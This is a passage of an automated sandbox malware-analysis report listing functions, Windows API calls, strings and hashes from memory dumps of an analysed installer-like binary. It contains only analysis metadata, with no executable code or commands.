                                                                                                                        • xOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQk, xrefs: 0092E920, 0092E926, 0092E937, 0092E93C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldiv$InterruptQueryTimeUnbiased__aullrem
                                                                                                                        • String ID: xOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQk
                                                                                                                        • API String ID: 493618052-83919110
                                                                                                                        • Opcode ID: e26fada44ee2cb61ff719ce6232d20c1246b4f3f44490d710abbcaf59a39dd9c
                                                                                                                        • Instruction ID: e90243e8a0ee827685defa4400f50873425374d95a6e4801f6fbf98c4fa7db86
                                                                                                                        • Opcode Fuzzy Hash: e26fada44ee2cb61ff719ce6232d20c1246b4f3f44490d710abbcaf59a39dd9c
                                                                                                                        • Instruction Fuzzy Hash: 64119A727003146FD714DF299C81A7BB6EDEBC8714B04892EF98AD7392E660AC408791
                                                                                                                        Function 008D23A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008D2419
                                                                                                                        • LoadLibraryW.KERNEL32(bcryptprimitives.dll,008CCC96,00000010,?,?,00000063,?,0089E6F9,?,?,00000000), ref: 008D242F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 008D243F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressInit_thread_headerLibraryLoadProc
                                                                                                                        • String ID: ProcessPrng$bcryptprimitives.dll
                                                                                                                        • API String ID: 1459703600-2667675608
                                                                                                                        • Opcode ID: 0bbd43abcc0e9c81c30dedfa38bbc36517b06a50417e7c6a587f062d28c5abff
                                                                                                                        • Instruction ID: a99c1eb7145c7de0292acbb127dcc2d91696d2434922c59c37dfe5ade0633dd4
                                                                                                                        • Opcode Fuzzy Hash: 0bbd43abcc0e9c81c30dedfa38bbc36517b06a50417e7c6a587f062d28c5abff
                                                                                                                        • Instruction Fuzzy Hash: 4B117D3260434457D728AB7DEC55E663715FFE1B15B04026EFE05C3761DB354845A722
                                                                                                                        Function 008C4C40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(00000000,?,?,-00000001,008446AD,00000000,?,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C5E
                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C6C
                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C7B
                                                                                                                        • LockResource.KERNEL32(00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C86
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008C4CB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds
                                                                                                                        • API String ID: 3473537107-2998926704
                                                                                                                        • Opcode ID: 947a011196e8894345ba9c9903cfa62aff8ed53cb0b17e715c53d64e04c3ff22
                                                                                                                        • Instruction ID: 04512f42d68d1cd7bcd8823c1351ee7de0d3ee2977146a5fae7767df2ee5bee8
                                                                                                                        • Opcode Fuzzy Hash: 947a011196e8894345ba9c9903cfa62aff8ed53cb0b17e715c53d64e04c3ff22
                                                                                                                        • Instruction Fuzzy Hash: CE0157B0610301AFDB14AB7A9C99E6BBAEDEFC47513088429B909D2251EB70D84087B0
                                                                                                                        Function 0089C830 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(process_win.cc,000000FD,000000FE), ref: 0089C894
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentProcess
                                                                                                                        • String ID: exited with code $..\..\base\process\process_win.cc$Process $process_win.cc
                                                                                                                        • API String ID: 2050909247-4186332098
                                                                                                                        • Opcode ID: 67991a49b1f28652290a4d5bab04fe00b85c653c082db94d6cc462d5fbf821ab
                                                                                                                        • Instruction ID: f1678ae74552900b58b42ea1b37248e197e4f29dcdbdfdbec80c46803744d877
                                                                                                                        • Opcode Fuzzy Hash: 67991a49b1f28652290a4d5bab04fe00b85c653c082db94d6cc462d5fbf821ab
                                                                                                                        • Instruction Fuzzy Hash: 25112971B003096ADE20B7B8EC5BFAA7368EBD1748F040434F545DA1C2EA7159188363
                                                                                                                        Function 00848830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 00848851
                                                                                                                        • GetLastError.KERNEL32 ref: 00848862
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,The elevated installer hangs and must be forcibly terminated.,00943746,00000001,EnsureProcessFinished,00000763,?), ref: 008488BF
                                                                                                                        Strings
                                                                                                                        • EnsureProcessFinished, xrefs: 00848882
                                                                                                                        • The elevated installer hangs and must be forcibly terminated., xrefs: 00848897
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastObjectProcessSingleTerminateWait
                                                                                                                        • String ID: EnsureProcessFinished$The elevated installer hangs and must be forcibly terminated.
                                                                                                                        • API String ID: 329558020-1814985891
                                                                                                                        • Opcode ID: a01b5af077b0aeceda17a079710fd6c6872b8145dd887c2b6e683f698af203e0
                                                                                                                        • Instruction ID: c19837d7e29e6994530993313cf90e35dbc4845566388a1e7b42638d8a32a3de
                                                                                                                        • Opcode Fuzzy Hash: a01b5af077b0aeceda17a079710fd6c6872b8145dd887c2b6e683f698af203e0
                                                                                                                        • Instruction Fuzzy Hash: DC112970608304AFDB10AB24DC87F5E7B66FFC0719F004828F549962D2DBA1AA04C793
                                                                                                                        Function 008BCBA0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008BCD40: GetLastError.KERNEL32 ref: 008BCD7F
                                                                                                                          • Part of subcall function 008BCD40: SetLastError.KERNEL32(00000000), ref: 008BCD94
                                                                                                                        • GetLastError.KERNEL32 ref: 008BCCC9
                                                                                                                        Strings
                                                                                                                        • CreateWellKnownSid failed, xrefs: 008BCCFB
                                                                                                                        • IsUserAnAdminGroup, xrefs: 008BCCE6
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008BCD29
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008BCD38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds$CreateWellKnownSid failed$IsUserAnAdminGroup
                                                                                                                        • API String ID: 1452528299-2313459760
                                                                                                                        • Opcode ID: e0173e1edb40ea9b66ceef71d98fe10cfd8076f128aa0fad2ceb66d4405c0b94
                                                                                                                        • Instruction ID: 823b22b51c75dd7826bc50dec2baa6e41a80d6f1790624cf57591d37641578b2
                                                                                                                        • Opcode Fuzzy Hash: e0173e1edb40ea9b66ceef71d98fe10cfd8076f128aa0fad2ceb66d4405c0b94
                                                                                                                        • Instruction Fuzzy Hash: 3541E6716043059BD7209F68DC926ABB7A1FFD4724F104A2CF999A3381D7B0B909CB92
                                                                                                                        Function 0089C950 Relevance: 7.6, APIs: 5, Instructions: 118synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0089C9A6
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0089C9E2
                                                                                                                        • WaitForSingleObject.KERNEL32(-00000002,00000000), ref: 0089C9EA
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0089CA30
                                                                                                                        • GetExitCodeProcess.KERNEL32(00000000,FFFFFFFF), ref: 0089CA3B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$CodeExitObjectSingleUnothrow_t@std@@@Wait__ehfuncinfo$??2@
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1195251599-0
                                                                                                                        • Opcode ID: 7131dcfe1564c4a15f130f08d56650fcce226b4807a638fbc5dc00fa64832ec5
                                                                                                                        • Instruction ID: e420d3432c5424776e2ae274bced2b67bf39bb439f5c7ee51ce09c53afbbe26b
                                                                                                                        • Opcode Fuzzy Hash: 7131dcfe1564c4a15f130f08d56650fcce226b4807a638fbc5dc00fa64832ec5
                                                                                                                        • Instruction Fuzzy Hash: 3441EFB17043098FDF24AFA8CC85BBB7BA8FB85314F184228E965DB2D1D7719D049760
                                                                                                                        Function 008BCE10 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 113COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • GetTokenInfo, xrefs: 008BCF09
                                                                                                                        • GetTokenInformation failed, xrefs: 008BCF1E
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008BCF4B
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008BCF63
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$GetTokenInfo$GetTokenInformation failed
                                                                                                                        • API String ID: 1452528299-3859318850
                                                                                                                        • Opcode ID: f7cebedbb59723043804945d2b8383ec47f0ee126f03224cb3b5b443610999e7
                                                                                                                        • Instruction ID: a72963b2a0bb62f2246c8ae61597e6d039b72cf9258e7f943e12aaa99573cc90
                                                                                                                        • Opcode Fuzzy Hash: f7cebedbb59723043804945d2b8383ec47f0ee126f03224cb3b5b443610999e7
                                                                                                                        • Instruction Fuzzy Hash: 7531C3B1608602AFC314DF29D8419AAB7E8FFD4B44F10892DF595D7351EB70E918CB92
                                                                                                                        Function 008F0630 Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitOnceExecuteOnce.KERNEL32(00972A68,Function_000D0610,?,00000000), ref: 008F0662
                                                                                                                        • TlsGetValue.KERNEL32 ref: 008F0693
                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00972A74), ref: 008F06A5
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00972A74), ref: 008F06D5
                                                                                                                        • TlsAlloc.KERNEL32 ref: 008F0763
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLockOnce$AcquireAllocExecuteInitReleaseValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 655554649-0
                                                                                                                        • Opcode ID: ecd679b36a6559446ca0f384aca615c52e3e0192d93f13c656c6e4c3c8d7c5ee
                                                                                                                        • Instruction ID: 05bdc5d4bd38aff9cd67f5893bd98ce7c4509e85ac2f1944e274dd97866c0c4e
                                                                                                                        • Opcode Fuzzy Hash: ecd679b36a6559446ca0f384aca615c52e3e0192d93f13c656c6e4c3c8d7c5ee
                                                                                                                        • Instruction Fuzzy Hash: 8831A076A243098FCB18AF75EC85A7E77B4FB88311B14012CE90AD3391DB35A845EF55
                                                                                                                        Function 0595CF7B Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0595CF82
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0595CF8F
                                                                                                                          • Part of subcall function 0595BE2E: __EH_prolog3_GS.LIBCMT ref: 0595BE35
                                                                                                                          • Part of subcall function 0595BE2E: std::_Lockit::_Lockit.LIBCPMT ref: 0595BE46
                                                                                                                          • Part of subcall function 0595BE2E: std::_Lockit::~_Lockit.LIBCPMT ref: 0595BE68
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0595CFE2
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0595D00C
                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0595D019
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2687776920-0
                                                                                                                        • Opcode ID: 55162455df08e4cc1204d67564256d4375ce3786900a0ef342f66119dac91406
                                                                                                                        • Instruction ID: 86bf6a4e93f74c47a6f1843b0335c1a38cb41872af8db16099ef475931eab61a
                                                                                                                        • Opcode Fuzzy Hash: 55162455df08e4cc1204d67564256d4375ce3786900a0ef342f66119dac91406
                                                                                                                        • Instruction Fuzzy Hash: 0721F471A04205DFDB04EF78D48867EB7F5AF84330F64451EE855D7290DB74AE128B80
                                                                                                                        Function 008BCD40 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: GetProcessToken$OpenProcessToken fail
                                                                                                                        • API String ID: 1452528299-1201466178
                                                                                                                        • Opcode ID: 5fd1920016c75a568c05fc69ac7ad3d96b6b5747209e425a2fddb403ad551ba4
                                                                                                                        • Instruction ID: a080930ba783498938a2d46af7c9b107fc1bf2c299bece10db42e4e696928ebb
                                                                                                                        • Opcode Fuzzy Hash: 5fd1920016c75a568c05fc69ac7ad3d96b6b5747209e425a2fddb403ad551ba4
                                                                                                                        • Instruction Fuzzy Hash: 9311D5756083046FD710AF64DC86B6A77A8FBC4725F04492DFA55863D1DB7098058BA2
                                                                                                                        Function 00926009 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 370COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __freea
                                                                                                                        • String ID: a/p$am/pm
                                                                                                                        • API String ID: 240046367-3206640213
                                                                                                                        • Opcode ID: 5458f2dbf12597d63e76ab12bca8615506a535bd2d9c71196cc7903e985dcf2c
                                                                                                                        • Instruction ID: e601d13311cba0e2b5b0879f1d8dbd866ce7da119f73e378cf03aaa91e711c18
                                                                                                                        • Opcode Fuzzy Hash: 5458f2dbf12597d63e76ab12bca8615506a535bd2d9c71196cc7903e985dcf2c
                                                                                                                        • Instruction Fuzzy Hash: BBC13534A04236DFCB24DF68E884BBE77B8FF45700F244059E941ABA59D335AD41CBA1
                                                                                                                        Function 008AEE60 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 250COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,008AEDEA,?,008B6900,008B932E,?,?,?,008B932E), ref: 008AEEC0
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,008AEDEA,?,008B6900,008B932E,?,?,?,008B932E), ref: 008AEEDC
